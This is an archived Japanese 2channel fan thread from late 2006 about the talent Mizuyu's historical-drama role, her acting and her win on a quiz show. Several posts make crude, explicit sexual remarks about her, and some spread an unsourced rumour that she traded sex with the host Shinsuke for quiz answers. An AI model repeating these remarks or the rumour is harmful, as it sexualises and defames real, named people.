99 :通行人さん@無名タレント:2006/12/22(金) 01:04:18 ID:RpU336bg
そのうち液晶もプラズマも今よりもっと手に入り易くなるよ。
ガンガレ

100 :通行人さん@無名タレント:2006/12/22(金) 01:06:50 ID:mnDurDx5
今日の夕刊フジに、みずゆうが、インタビュー受けてたよ。
今度の火曜日の歴史特番で9代将軍家重役をやることについて、
家重=女説について、彼女は歴史大好きなので、「面白くて引き込まれた。」と目を輝かせる。
撮影の時はさらしを巻いて撮影に臨んだ。

そして、その再現ドラマで何とみずゆうが、大奥での「濡れ場」に挑戦しているそうだ。
(∋_∈)
みずゆうは、インタビューで「初めてのベッドシーンなのに女同士。でも、相手役の方が色っぽくて、ドキドキしちゃいました」と笑う。
家重を演じて、「演技時代劇にも興味がわいてきた」とコメント。

写真は家重役の写真と後ボクサースタイルでグローブつけてファイティングポーズを取ったみずゆうの写真2枚ある。
夕刊フジある所は、明日の朝の内に購入すべし。
16面に掲載されています。

俺個人は、みずゆうには、ラブシーンはして欲しくないよ。
みずゆうが抱かれていると、今思いを寄せている彼女 とダブるから、辛いよ。
でも、女性同士で良かった。
これが、男性とのラブシーンなら、鬱になったよ。

みずゆうには、ラブシーンよりアクションシーンが似合ってるよ。


昨日のバリバリの実況スレでは、パンチラ来たー!と書き込みもあったな。
俺は、見えてないと思うけど、見えるか見えないかのギリギリがまたそそられるよ。
名古屋の人うらやましいな。
ビバお仕事見たいな。

101 :通行人さん@無名タレント:2006/12/22(金) 06:12:43 ID:yP+9NlvP
>>100

レズ将軍役だな。

102 :通行人さん@無名タレント:2006/12/22(金) 08:11:58 ID:t4AOTwZL
http://0server.ddo.jp/~saki/link.php?id=02369
http://0server.ddo.jp/~saki/link.php?id=02372
http://0server.ddo.jp/~saki/link.php?id=02373

103 :通行人さん@無名タレント:2006/12/22(金) 20:23:02 ID:h59+puT5
      -ッ´/ : : : : : : : : : : : : : : : : : : ; : : : : : : : : : : : : ヽ
     //:/ : : : : : : : ;ィ' : : : : ;、 '´/ : : : : : : : : : : : : : : '.,
     //: : : : : ッ:.:// : : : /   /.: : : : : : : : : : : : : : : : :',
   / /: :,ィ : : ://7゛: ;/    /: : : : : : : : : : : : : : : : : : : i
   /: :///: :/ _,,.イ;;_'゙´     / : : ;ィ : : : : ;ィy: : : : : .; : : : :l
   !//: : l: .;イ f'"´ ,.、-.、ヽ、  /: :/;.:、 ‐'"´/;、‐<ソ゛. : : : |
   /: : /|/  l   i!;::(シ::) '、 // '´   _,._;ッ;,'、,_  /: : ;. : : :l
   l : :i 〈〈',  ヽ  ' ー ゛ ,  ´     /,、.-.、 ソrイッ' : :/ /
    ! :ハ :ヽ',   `' ‐-ッツ           i:::(シ::i!  l〉/ :/: /
     '゛'; k : ',    ´´         、ト、`' - '゙ ,シ/: :/  夫馬! 名無しで荒らしてる場合か!
      ` ヽ:.',             `ヾ``''ツ7゛:´: : : /   さっさと定職に就け!      
            ヽ      rシ         // : ; : /
            \   `ャx、..,,__    _,/'´:/'´/
            \   ` ̄    ̄`フ/ィ /


104 :通行人さん@無名タレント:2006/12/22(金) 22:47:00 ID:eBlM8YYb
>>100
97の言うようにショートパンツならパンチラはほぼありえないわけだが。


105 :通行人さん@無名タレント:2006/12/22(金) 23:41:12 ID:+7TuwwyI
レズシーンみたいけど、チョンマゲでやられてもな…

106 :通行人さん@無名タレント:2006/12/22(金) 23:54:32 ID:pQllwQLe
例の大根芝居を復活するなんて・・・無謀

107 :通行人さん@無名タレント:2006/12/23(土) 01:02:56 ID:z1iPAweS
そうだった!すっかり忘れてたけど、この子、演技力がゼロなんだった・・・


108 :通行人さん@無名タレント:2006/12/23(土) 01:51:24 ID:UUEz7YP9
大丈夫。どん底経験したら、後は上手になるだけ。
今回は期待しよう。

みずゆうは、あの人が辞めた後の水戸黄門で女忍者役をやるよ。

入浴シーンも見たいな。

みずゆうは、場をこなすだけ、上手になるから。
今まで、ドラマ経験とか少ないから、大根扱いされたけど、そういう仕事が増えたら、絶対上手くなるよ。

みずゆうは努力家だから。

109 :通行人さん@無名タレント:2006/12/23(土) 01:54:21 ID:z1iPAweS
しばらく消えるといっていたキモキモ君がまだいるような気がするんだが、俺の気のせいだろうか?


110 :通行人さん@無名タレント:2006/12/23(土) 03:18:28 ID:44XWOiT2
ほれが何やねん?
おどれはキモキモの兄貴になんぞ文句でもあるんかい?

111 :通行人さん@無名タレント:2006/12/23(土) 10:46:07 ID:ohvrwjrW
下手な関西弁やめろや、ハゲ

112 :通行人さん@無名タレント:2006/12/23(土) 11:24:46 ID:44XWOiT2
なんや虫が鳴いとるわw

113 ::2006/12/23(土) 13:39:26 ID:ohvrwjrW
なんや蟲が湧いとるわw

114 :通行人さん@無名タレント:2006/12/23(土) 14:01:30 ID:iU8Uyh0C
一切の遠慮無しで思い切り大量のザーメンをオマンコの奥に中出ししたい。

115 :通行人さん@無名タレント:2006/12/23(土) 15:17:33 ID:WOFXGQM5
>>114
そのレス、どこかでみたなぁ

116 :通行人さん@無名タレント:2006/12/23(土) 16:18:35 ID:BuLf84dM
114のレスはいかにも童貞らしくて逆に好感が持てる。


117 :通行人さん@無名タレント:2006/12/23(土) 18:37:23 ID:/l3vtTXd
俺にはどうしても裕子が神に見える・・・・

118 :通行人さん@無名タレント:2006/12/24(日) 13:46:57 ID:7BTpJAli
☆ Merry Christmas ☆       ☆彡

Bing Crosby - White Christmas (1942)
http://www.youtube.com/watch?v=NthiA9bVaGg

119 :通行人さん@無名タレント:2006/12/24(日) 23:13:26 ID:L5OQWI3M
裕子ちゃんと、シャンパン飲みたいお

120 :通行人さん@無名タレント:2006/12/25(月) 19:32:33 ID:/bvGZyA4
一切の遠慮無しで思い切り大量のザーメンをオマンコの奥に中出ししたいお。

121 :通行人さん@無名タレント:2006/12/25(月) 21:10:16 ID:ShWJXPID
12月26日(火) テレ東
歴史ミステリ―ロマン第3弾 大奥U〜江戸の大事件の裏で
暗躍した大奥の陰謀を暴く!!
PM20:54〜PM22:48

122 :通行人さん@無名タレント:2006/12/25(月) 22:31:11 ID:kNzuYnZv
どうかミズユウの大根芝居が上達してますように、ザーメン。

123 :通行人さん@無名タレント:2006/12/26(火) 12:14:42 ID:+K8kthYL
2147以降にみずゆうのドラマが見れますように。
m(_ _)m
一番最後にみずゆうのドラマが見れたらいいな。
(*^_^*)

124 :通行人さん@無名タレント:2006/12/26(火) 12:25:52 ID:wh1T+QFG
これでOKかな?
http://zippedurl.com/6r6u8d

125 :通行人さん@無名タレント:2006/12/26(火) 22:43:25 ID:Xb9u0nUp
みずゆうがプチ宝塚してたね。
それに明日はヘキサゴンU

126 :通行人さん@無名タレント:2006/12/26(火) 23:34:06 ID:LMsSqgg7
予想通りの大根ぶりだったね。他の女優たちと比べると明らかに演技というものの質が違った。
プロの中で、一人だけ法律番組の再現VTRのような素人演技だった。
でもそこがかわいいわけだが。
うーん・・・連ドラ出演への道は遠そうだ・・・

127 :通行人さん@無名タレント:2006/12/26(火) 23:59:36 ID:E8jsL7R+
みずゆう、大丈夫、これからだ!

128 :通行人さん@無名タレント:2006/12/27(水) 10:32:35 ID:nbw6cmkY
役者は止めよう・・・無理

129 :通行人さん@無名タレント:2006/12/27(水) 12:30:18 ID:NVx6ISMz
みずゆうは、女優になる気はないじゃまいか?
(^。^;)
セリフが少ないアクション女優ならやれるかも。
あの、プレイガールを復帰させれば、アクション+セクシー女優として、やれるかも知れないが。

今のみずゆうでもいいお
(*^_^*)
本人に今ひとつやる気が見えない。
f^_^;

130 :通行人さん@無名タレント:2006/12/27(水) 15:09:00 ID:LAJkubQL
ミズユウにはアクション路線は無理。
筋力はあるが、運動神経は鈍い。ここでは常識のハズ。

131 :通行人さん@無名タレント:2006/12/27(水) 15:38:00 ID:lGxIpkCc
その通り。確かに基礎体力はあるから、
走るとか泳ぐとか跳ぶとかの単純な競技はできるんだが、
球技とか下手糞そうだし、複雑なことは向いてない。
演技も出来ないし、教養もないし、
このままじゃ難しいなあ。
やっぱり得意を伸ばすしかないね。
単純競技と釣りとレース、この3つにしがみつく感じでがんばれ!
その代わり、その3つだけは誰にも負けるな!
レースでは保坂に負けたよな。レースをもっと極めろ。


132 :通行人さん@無名タレント:2006/12/27(水) 18:44:50 ID:t76W9k1p
うぎゃー!
ヘキサ、みずゆう、ペーパーテスト一位や!
ナイスだみずゆう!

133 :通行人さん@無名タレント:2006/12/27(水) 19:04:21 ID:FpElNGgb
運動も出来て頭もいいとはビックリしたよ!

134 :通行人さん@無名タレント:2006/12/27(水) 20:02:21 ID:6a1CDI7q
勉強も運動も出来るって、優等生だったんじゃ。

135 :通行人さん@無名タレント:2006/12/27(水) 20:54:55 ID:t76W9k1p
しかも、みずゆうチーム優勝だーーーーー!
ますます、好きになったよ、みずゆう!
ラサールより賢いし。
建国記念の日を正確に書いてた。『の』がはいるの知らなかった……
みずゆう、サイコーーー

136 :通行人さん@無名タレント:2006/12/27(水) 21:15:28 ID:NVx6ISMz
みずゆうって、高校出かな?
凄いね。最初は、ボケ要員かなと本気で心配したお
(^。^;)
でも、心配無用でしたね。

でもこれで、ますます、みずゆうと今好きな女性のイメージが重なるな。
頭良くて、スポーツウーマンなんて。欠点は何だろう?

みずゆうは、好きになったら、自分から告白するのかな?
今度は逃亡者ですね。
あれ前見た時レベル高いから、30分以上逃げ切れたら凄いな。

みずゆうに、持久力が問われますね。

楽しみです。
(*^_^*)

137 :通行人さん@無名タレント:2006/12/27(水) 21:20:23 ID:0i7NvO5G
おなじチ―ムだったほしのあきちゃんの、お色気をちょっとは見習おうね。

138 :通行人さん@無名タレント:2006/12/27(水) 22:12:33 ID:NVx6ISMz
みずゆうは、脚もきれいだし、色気はあるよ。
只、ほしのあきは、色気出して仕事している。
みずゆうには、色気は求めていない。
(^。^;)

色気は好きな男性の前だけに、出せればいいと思う。

色気のない女性漏れの知り合いにもいるけど、その人は、色気出そうと思えば出せるけど、敢えて出してないと思うよ。

色気はないけど、綺麗な人ですよ。
みずゆうもそんな女性でいいんじゃないの?
みずゆうの事愛してくれる男性だけにみずゆうの色気が解ればそれでいいじゃん。

139 :通行人さん@無名タレント:2006/12/27(水) 22:13:41 ID:lGxIpkCc
ペーパーテストの件、
体とひきかえにシンスケに事前に答えを教えてもらった可能性があるな・・・

考えすぎだろうか?



140 :通行人さん@無名タレント:2006/12/27(水) 22:53:40 ID:NVx6ISMz
紳助は、ペーパーテストとか関係ないと思うし、みずゆうの事女と見てないけん、それはなしだろう。

141 :通行人さん@無名タレント:2006/12/27(水) 23:24:34 ID:6cOmEFxF
自分も録画したのを先ほど見てみたよ。
結構クイズは平均より難しいという感想。
前半の雑学が特に難しく感じた。約3割不正解。
漢字はとりあえず全問読めたことは読めたが
書けと言われたら多分書けないものも多い。

でもやっぱり思ったとおりすごいね。
みずゆう、ペーパー一位、優勝おめでとう。
今年のいい締めになりました。(^^)

142 :通行人さん@無名タレント:2006/12/28(木) 02:48:22 ID:7VQN6x0y
みずゆう、ハッスルでないかね?

結構知識人だな。驚いた。

143 :通行人さん@無名タレント:2006/12/28(木) 06:13:33 ID:CjFmf07u
ID:lGxIpkCc

自分の発言のミスを認められないなんて
恥ずかしいヤツだなw




144 :通行人さん@無名タレント:2006/12/28(木) 08:18:33 ID:UAG/ZHhC
この前のTBS感謝祭で1位になって、昨日も、1位でみずゆうは頭いいね。

でも、1月6日25分だけど、出る番組かぶっとるやん。
フィッシングとテレ朝特番。あーどうしよう(^。^;)

145 :通行人さん@無名タレント:2006/12/28(木) 11:59:00 ID:UAG/ZHhC
ハッスルは、面白いけど、今は真鍋かおりが中心だし、またアスリート路線には戻りにくい。

それなら、僕はみずゆうにぴったりなのは、K1の年末の「ダイナマイト」のキャスターをやって欲しいな。

みずゆうが、ドレス着て、CXの陣内紀香に負けない程のセクシードレス見たいな。
どうして和香パイがキャスターかわからない。
実際にアルティメットのリングに立ったみずゆうにやらせるのが、一番。
井上和香首にして、みずゆう起用お願いしますよ。

でもいつかTBS系でK1マックスのリポートやってたな。

いつの間にかブスとアーパーアナが担当になったな。

事務所の予定に載ってなかったし、もう今年のみずゆうは見納めか?
寂しいな。

146 :通行人さん@無名タレント:2006/12/28(木) 14:11:25 ID:7VQN6x0y
Kー1MAXで確かリポーターやった事あるよ?

みずゆうがハッスルでたらぜってー観に行くけどな。
眞鍋かをりがハッスル軍なら、モンスター軍でいいからさ。
小川・眞鍋VS川田・みずゆうとか。

147 :通行人さん@無名タレント:2006/12/28(木) 19:25:38 ID:phYTtq7y
クイズ番組はシンスケ司会の特番に出演するだけ。ここがポイント。
台本を事前に貰って答えを知ってる司会者シンスケの愛人説も説得力がある。
フィッシングの制作者はシンスケの息がかかった在阪プロデューサー。

結局、シンスケ絡みの番組にレギュラー出演してるだけ。この事実から目をそらすな。

148 :通行人さん@無名タレント:2006/12/28(木) 20:06:33 ID:+EWoIvTr
>>147
何一人で必死に分析してんの?

149 :通行人さん@無名タレント:2006/12/28(木) 20:13:23 ID:DISY78Zp
ただいマソコ いま帰ってきたよー

150 :通行人さん@無名タレント:2006/12/28(木) 20:14:24 ID:irpx/sI+
ソースのないものは言ったもん勝ち


151 :通行人さん@無名タレント:2006/12/28(木) 20:57:30 ID:9LsoZp/K
ヘキサゴンペーパーテスト1位ってすごいな
でも今は、何かとバカがもてはやされる時代だからあまりプラスにならないかも
いずれみずゆうがバカ優先のTV界の流れを変えてくれることに期待したい

152 :通行人さん@無名タレント:2006/12/28(木) 22:05:18 ID:RghiabXr
まあ、知らないことを放っておくのが嫌だから、分からないことは自分で調べて、結果知識が豊富になったのかな
何か負けず嫌いの性格からして、そんな気がする

153 :通行人さん@無名タレント:2006/12/28(木) 23:02:32 ID:phYTtq7y
アホか。シンスケのクイズ番組以外で勝ってから盛り上がれ。出演オファーすらないのが現実w

154 :通行人さん@無名タレント:2006/12/28(木) 23:04:57 ID:phYTtq7y
つまり、シンスケから司会者用台本を見せてもらってるから勝てる。

155 :通行人さん@無名タレント:2006/12/28(木) 23:13:57 ID:2Xblg9G0
そんなこたどうでもいいよ。 ただ・・・
みずゆうに知識量で負けるわけにはいかん。
漏れはラ・サールくらいはあるはずだと思うよ。
過去のクイズ見る限り自分ではそう思う。
さしで勝負出来ればしてみたいww
体力で負けてる分コレハ勝てないといけないw

156 :通行人さん@無名タレント:2006/12/29(金) 00:08:40 ID:S4Kjfsuy
ID:phYTtq7yとみずゆうのクイズ合戦が見たい


157 :通行人さん@無名タレント:2006/12/29(金) 12:00:14 ID:EVtUn3mU
おんな同士の濡れ場ハアハアだなw

158 :通行人さん@無名タレント:2006/12/29(金) 14:37:32 ID:PjAdNTIu
あれごときでベットシーンとは片腹痛いわ!
せめて簾がなければよかったのに・・・

159 :通行人さん@無名タレント:2006/12/29(金) 20:30:42 ID:vLpXcW6I
とりあえず漏れは明日から戻ってくるよ。
心配事・体調についてはほぼ克服。 意外に早かったw 
精神的に今年一番の安定度。 青信号点灯。。。(^^)
おすすめ2ちゃんねる、類は友を呼ぶみたいやねw 
方向性が。。。今後は色々と自己規制します・・・(^^;

160 :通行人さん@無名タレント:2006/12/29(金) 21:15:55 ID:SMJmDMdE
みずゆうの発言には奥行きがない

そこから話が広がらない


でもかわいいから許す

161 :通行人さん@無名タレント:2006/12/29(金) 21:25:31 ID:7ucKouQU
>>156
ラサール石井の名前をラ・サールと書いた時点で>>155の負けだと思う。

162 :通行人さん@無名タレント:2006/12/29(金) 21:38:58 ID:7jkzHQhk
>>155
俺もラサールごときには負けない自信があるよ。
俺とクイズ対決しよう。


163 :通行人さん@無名タレント:2006/12/30(土) 00:18:22 ID:Oh6CF9uz
みずゆうのマソコならどんなに臭くとも1日中ナメ続けることができる!

48 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)